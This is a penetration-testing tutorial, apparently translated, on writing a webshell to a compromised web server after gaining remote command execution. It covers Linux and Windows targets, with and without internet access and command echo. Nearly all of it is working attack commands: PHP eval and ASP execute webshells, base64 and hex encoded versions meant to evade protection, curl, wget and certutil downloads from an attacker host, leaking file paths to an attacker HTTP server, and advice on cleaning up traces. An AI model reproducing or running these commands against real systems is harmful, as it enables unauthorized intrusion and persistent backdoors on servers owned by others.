0x01 Preface
How to write to Webshell after obtaining a permission to execute commands by exploiting various RCE remote command execution or MSSQL injection vulnerabilities? Here we conduct some tests based on multiple scenarios that may be encountered, such as: Linux/Windows, out/out of the Internet, with/without echo.
Generally, when we are sure that we can execute the command, we will choose to go online directly to CS/MSF, but we will also encounter the scenario where there is no Internet access and no echo. In this case, we may need to find the absolute path of the target website and write a Webshell first. Then, follow-up information collection and intranet penetration are carried out.
Note: We can upload a file randomly through the upload function in the front/background of the website, and then use commands such as Windows for or Linux to find the file just uploaded, or the existing file under the website to get the absolute path, and finally Just write to the file and continue to look down.
0x02 Linux
(1) The target is out of the network, and the command is echoed
If the target host can go out to the Internet, and the execution command is echoed, then we can directly obtain the absolute path of the target website by executing the following command, and then use the following methods to write or download the Webshell.
Find absolute paths:
copylocate 1653042293000.png 2>/dev/null find / -name 1653042293000.png 2>/dev/null find / | grep 1653042293000.png 2>/dev/null find /var/www/html/ -name "*.php" | xargs grep "so-and-so website"
Write in the normal way:
copyecho '<?php eval($_POST[1]);?>' > /var/www/html/shell.php
Remote download write:
copycurl http://192.168.1.120/shell.txt > /var/www/html/shell.php wget http://192.168.1.120/shell.txt -O /var/www/html/shell.php
(2) The target is out of the network, and the command is not echoed
If the target host can go out to the Internet, but there is no echo when executing the command, then we can use the httplog method to obtain the absolute path of the target website by executing the following command, and then use the following method to write to the Webshell, which can be escaped or protected. Try writing in encoding.
Find absolute paths:
copypython -m SimpleHTTPServer 8888 curl http://192.168.1.120:8888/`find / | grep 1653042293000.png` wget http://192.168.1.120:8888/`find / | grep 1653042293000.png`
Write in encoding:
copyecho PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.php echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php
(3) The target is not connected to the Internet, and the command is not echoed
If the target host cannot go out to the Internet, and there is no echo when executing the command, we can first traverse the absolute path of the 1653042293000.png file by executing the following command, and then traverse the absolute path of the file again, or write Webshell to the file at the same time level directory.
In practical applications, it is best to first determine the absolute path of the target website, and then write to the Webshell separately. It is best not to use the second command directly, because if there is a file with the same name on the target host, it will be written to the multiple absolute paths found. When entering the file, you should also pay attention to cleaning up traces.
Find the absolute path to write to the web directory:
copyfind / -name 1653042293000.png | while read f;do sh -c 'find / -name 1653042293000.png' >$(dirname $f)/path.txt;done
Find the absolute path to write to the Webshell:
copyfind / -name 1653042293000.png | while read f;do sh -c "echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d">$(dirname $f)/shell.php;done find / -name 1653042293000.png | while read f;do sh -c "echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps">$(dirname $f)/shell.php;done
0x03 Windows
(1) The target is out of the network, and the command is echoed
If the target host can go out to the Internet, and the execution command has an echo, then we can obtain the absolute path of the target website by executing commands such as dir, where, for, finstr, or reading the IIS configuration file, and then use the following Multiple ways to write or download webshells.
Find absolute paths:
copydir /a/b/s C:\1653042293000.png where /r C:\1653042293000.png for /r "C:\" %i in (1653042293000.png*) do @echo %i findstr /n /s /i "so-and-so website" C:\*.asp %windir%\system32\inetsrv\appcmd list VDIR
Write in the normal way:
set /p="<%execute request("1")%>" <nul >> C:\inetpub\wwwroot\shell.asp
echo ^<%execute request("1")%^> > C:\inetpub\wwwroot\shell.asp
certutil -urlcache -split -f http://192.168.1.105:8080/shell.txt C:\inetpub\wwwroot\shell.asp
(2) The target is out of the network, and the command is not echoed
If the target host can go out to the Internet, but there is no echo when executing the command, then we can run the following command to find the 1653042293000.png file in the specified C drive in a loop, save the absolute path of the found file in the %i variable, and then execute certutil Obtain the absolute path of the target website through httplog, or write it directly into the Webshell. If escaping or protection is required, you can try to write in encoding, and shell.txt needs to be cleaned up.
Find absolute paths:
copypython -m SimpleHTTPServer 8888 for /r C:\ %i in (1653042293000.png*) do certutil -urlcache -split -f http://192.168.1.120:8888/%i
Write in the normal way:
for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.aspWrite in encoding:
copyfor /r C:\ %i in (1653042293000.png*) do echo PCVleGVjdXRlIHJlcXVlc3QoIjEiKSU+ > %i/../shell.txt & certutil -decode %i/../shell.txt %i/../shell.asp for /r C:\ %i in (1653042293000.png*) do echo 3C256578656375746520726571756573742822312229253E > %i/../shell.txt & certutil -decodehex %i/../shell.txt %i/../shell.asp
(3) The target is not connected to the Internet, and the command is not echoed
If the target host cannot go out to the Internet, and there is no echo when executing the command, then we can execute the following command to find the absolute path of the 1653042293000.png file, or write the Webshell to the same level directory of the file, which needs to be escaped or have You can try to write in encoding mode during protection.
Although the two commands look similar, the execution efficiency of the first one is higher, because it has been written during the execution of the command, and the second one must be written after the execution of the command is completed, so I personally recommend using the first one. Kind, pay attention to clean up the traces under the file path of the same name.
Find the absolute path to write to the web directory:
for /r C:\ %i in (1653042293000.png*) do echo %i> %i\..\path.txt
for /f %i in ('dir /s /b C:\1653042293000.png') do echo %i> %i\..\path.txt
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c dir /a/b/s C:\1653042293000.png > path.txt"Find the absolute path to write to the Webshell:
for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp
for /f %i in ('dir /s /b C:\1653042293000.png') do echo ^<%execute request("1")%^> > %i/../shell.asp
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c echo ^<%execute request("1")%^> > shell.asp"
Conclusion at the end of the article:
In this article, I will divide the way to find the absolute path into 3 ways: command search (with echo), httplog takeout (without echo), write to the Web directory (without Internet access), and three ways to write files: Regular write, encoded write, remote download. Linux and Windows use the same way, but the commands are different. They all find the absolute path according to the file name and file content. The common file writing and downloading methods are used for Getshell.